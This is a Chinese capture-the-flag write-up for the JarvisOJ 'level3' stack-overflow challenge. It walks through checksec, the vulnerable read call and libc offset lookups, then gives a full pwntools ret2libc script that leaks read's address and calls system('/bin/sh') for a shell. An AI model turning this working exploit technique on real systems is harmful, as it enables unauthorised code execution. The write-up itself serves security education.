2. 程式人生 > >Writeup of level3(Pwn) in JarvisOJ

Writeup of level3(Pwn) in JarvisOJ

阿新 發佈:2019-01-11

又拾起了被我擱在一邊快一個月的Pwn……(這一個月我被Android逆向拐跑了?)

不扯了,看題。

0x00 checksec

拿到檔案先查checksec,得到如下資訊:

[email protected]:~/Desktop/Pwn/level3# checksec level3
[*] '/root/Desktop/Pwn/level3/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

 
[email protected]:~/Desktop/Pwn/level3# checksec libc-2.19.so
[*] '/root/Desktop/Pwn/level3/libc-2.19.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

level3沒有canary,可以利用棧溢位;棧不可執行(所以不考慮shellcode);沒有開地址隨機化;至於libc-2.19.so,必然是開了地址隨機化;

0x01 exp logic

用IDA開啟level3,看程式邏輯

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}
ssize_t vulnerable_function()
{
  char buf; // [sp+0h] [bp-88h]@1

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u);
}


進入main函式後先呼叫vulnerable_function,這裡的關鍵是——呼叫了read。於是Step1應該是通過read構造棧溢位,棧溢位的目的是執行system("/bin/sh"),但是Alt+T搜了一番發現並沒有相關函式與字串,迷茫……

後來想起來學長說過在libc裡面知道了read或者write就能推出system,彷彿有所領悟……

此處的elf和libc.so在elf執行時應當是同時載入到記憶體中,所以Step2應當是通過一系列操作獲取某次執行時system和/bin/sh在記憶體中的絕對地址(至於這一系列操作……著實卡了我不少時間……後來幸虧找了某位巨佬的wp……才徹底理清思路)至於Step3……複寫地址,入門套路。

  • Step1:通過vulnerable_function中的read構造棧溢位,並且覆寫返回地址為plt中write的地址
  • Step2:通過write洩露出read在記憶體中的絕對地址,並且接著呼叫vulnerable_function(PS:got中的read儲存著read在記憶體中的真實地址)
  • Step3:計算出system和/bin/sh的絕對地址,再通過vulnerable_function構造棧溢位進行覆寫
  • Success

0x02 exp script

首先寫指令碼之前應做好準備工作,比如readelf把so檔案中幾個關鍵函式和字串搜一遍 
[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   571: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
   705: 0006f220    50 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  1166: 000e0c40  1461 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
  1263: 000ec390    46 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.7
  1698: 000643a0   259 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  2181: 000c3030   204 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.1
  2300: 000643a0   259 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
[email protected]:~/Desktop/Pwn/level3# readelf -a ./libc-2.19.so |grep "[email protected]"
   111: 00033690    58 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.10
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   554: 000b5f24    24 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   609: 0011c2a0    56 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
   645: 00033660    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.10
   868: 00033490    84 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.1.3
  1037: 00126800    60 FUNC    GLOBAL DEFAULT   12 [email protected]_2.0
  1492: 000f9160    62 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
  2243: 00033290    77 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  2386: 000f9cd0     2 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.2
[email protected]:~/Desktop/Pwn/level3# strings -a -t x ./libc-2.19.so | grep "/bin/sh"
 16084c /bin/sh
篩選之後得到 
   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
 16084c /bin/sh
隨後開始寫exp 
from pwn import *
r=remote('pwn2.jarvisoj.com',9879)
e=ELF('./level3')

plt_write=hex(e.plt['write'])
got_read=hex(e.got['read'])
vulfuncadr=hex(e.symbols['vulnerable_function'])
plt_write_args=p32(0x01)+p32(int(got_read,16))+p32(0x04)
#呼叫順序:func1_address+func2_adress+……+func1_argslist+func2_argslist+……
payload1='A'*(0x88+0x4)+p32(int(plt_write,16))+p32(int(vulfuncadr,16))+plt_write_args

r.recv()
r.send(payload1)
readadr=hex(u32(r.recv()))#洩露read絕對地址

#   950: 000daf60   125 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
#  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 [email protected]@GLIBC_2.0
#   139: 00033260    45 FUNC    GLOBAL DEFAULT   12 [email protected]@GLIBC_2.0
# 16084c /bin/sh

libc_read=0x000DAF60
offset=int(readadr,16)-libc_read #計算偏移量
sysadr=offset+0x00040310 #system絕對地址
xitadr=offset+0x00033260 #exit絕對地址
bshadr=offset+0x0016084C #binsh絕對地址
payload2='A'*(0x88+0x4)+p32(sysadr)+p32(xitadr)+p32(bshadr)

r.send(payload2)
r.interactive()

好,成功地把伺服器pwn了下來23333,接下來求flag得flag,直接cat flag

0x03 Notes

相關推薦

Writeup of level3(Pwn) in JarvisOJ

又拾起了被我擱在一邊快一個月的Pwn……(這一個月我被Android逆向拐跑了?) 不扯了,看題。 0x00 checksec 拿到檔案先查checksec,得到如下資訊: [email protected]:~/Desktop/Pwn/level3# check

Writeup of x64Lotto(reverse) in reversing.kr

此題風格詭異,有一種野生逆向的既視感(瘋狂改跳轉) 不扯別的,先下載附件。得到lotto.exe,無殼。接下來開始正式分析。 0x00 反編譯程式碼邏輯 int __cdecl main(int argc, const char **argv, const char **e

(未完)Writeup of Take the maze (reverse) in BugKu

好題(可惜我還沒做出來,只做到一半) 簡述一下邏輯吧,首先觀察程式,main函式調F5虛擬碼失敗,看看函式尾是不是要修改棧指標。果然,修改棧指標後,跳出了F5虛擬碼。 觀察一下main函式的邏輯:

ORA 12505 Listener does not currently know of SID given in connection descriptor

water iss dev lob .html 紅色 fcm home address oracle數據庫正常啟動後。在本地能夠正常訪問,可是遠程使用sqldevelop卻不能訪問。提示ORA 12505 Listener does not currently know

Found 1 slaves: Use of uninitialized value in printf at /usr/local/percona-toolkit/bin/pt-online-schema-change line 8489

console val take file logs printf nbsp found try 1. problem description: as the title show, i miss the first problem using pt-online-s

Android java.lang.NoSuchFieldError: No static field xxx of type I in class Lcom/XX/R$id; or its superclasses

activity oid 返回 反射 分享 -c lar 進行 是否 項目開發快到尾聲,突然發現之前一個模塊莫名其妙的奔潰了,我的內心也是奔潰的。以前一直都是好好的,也沒去動過它,為啥會出現這樣的問題呢? 下面我會根據自己的理解來看待問題 android是怎麽根據id查找

ionic3打包出錯ionic cordova build android(系列一):could not find an installed version of gradle either in android studio

lan 問題 打包 fail .html ascii failed contains ref 1.運行ionic cordova build android 時報錯:could not find an installed version of gradle either i

ES6: for...of VS for...in

highlight 範圍 ons dom erro 原型 設計 tor 數字 for...of和for...in是js中常用的兩個遍歷的方法,但是它們遍歷是有區別的,最主要的區別就是: (1)for...of是遍歷key, value中的value即鍵值,for...of一

Semi-supervised Segmentation of Optic Cup in Retinal Fundus Images Using Variational Autoencoder 論文筆記

str 很好 流程 Coding 測試 eat www tin nal MICCAI 2017年論文 Overview: 視杯視盤精確分割後,就可以計算杯盤比了,杯盤比是青光眼疾病的主要manifestation。以往的方法往往采用監督學習的方法,這樣需要大量的精確像素

LeetCode 562. Longest Line of Consecutive One in Matrix(在矩陣中最長的連續1)$

find ive col discus hint 分開 arr public 標簽 Given a 01 matrix M, find the longest line of consecutive one in the matrix. The line could be

leetcode562- Longest Line of Consecutive One in Matrix- medium

color 一個 mat etc 依賴 ould bound result 連續 Given a 01 matrix M, find the longest line of consecutive one in the matrix. The line could be h

[LeetCode] Prime Number of Set Bits in Binary Representation

pri return not prim 統計 all bits clu leet Given two integers L and R, find the count of numbers in the range [L, R] (inclusive) having a p

762. Prime Number of Set Bits in Binary Representation 二進制表示形式中的素數位數

num number uri auto func href order ger xpl Given two integers L and R, find the count of numbers in the range [L, R] (inclusive) having

for..of與for..in

循環 log defined length define name fin 為什麽 name屬性 var arr=[1,2,3,5] undefined for(var m of arr) console.log(m)//1,2,3,5 for(var m in

[LeetCode] 323. Number of Connected Components in an Undirected Graph 無向圖中的連通區域的個數

arr from sla cnblogs AI dup each rect href Given n nodes labeled from 0 to n - 1 and a list of undirected edges (each edge is a pair of n

j-3. .each(),for each ,for of ,for in-------待續

包裝 修改 -- 方式 () this指向 element sof UNC .each()是一個for循環的包裝叠代器.each()通過回調的方式處理,並且會有2個固定的實參,索引與元素(從0開始計數).each()回調方法中的this指向當前叠代的dom元素<but

421. Maximum XOR of Two Numbers in an Array

可變 這樣的 TE 固定 需要 AI class turn copy 這題要求On時間復雜度完成, 第一次做事沒什麽思路的, 答案網上有不貼了, 總結下這類題的思路. 不局限於這個題, 凡是對於這種給一個 數組, 求出 xxx 最大值的辦法, 可能上來默認就是dp, 但

ORA-12514: TNS:listener does not currently know of service requested in connect descriptor

_id col esc ddr system rip sys ESS select 在主庫查詢 SELECT DEST_ID,ERROR FROM V$ARCHIVE_DEST where rownum<3; 報錯如下: ORA-12514: TNS:liste

762. Prime Number of Set Bits in Binary Representation二進制中有質數個1的數量

nta 圖片 rime slist 代碼風格 輸出 -s turn 特殊 [抄題]: Given two integers L and R, find the count of numbers in the range [L, R] (inclusive) having a

for...of和for..in區別

方法 highlight pre generator 屬性 一個 script 包括 code for...of 是ES6新增的遍歷方法,用來遍歷具有 iterator 接口的數據,一個數據只有部署了Symbol.iterator屬性才可以用for...of來遍歷 for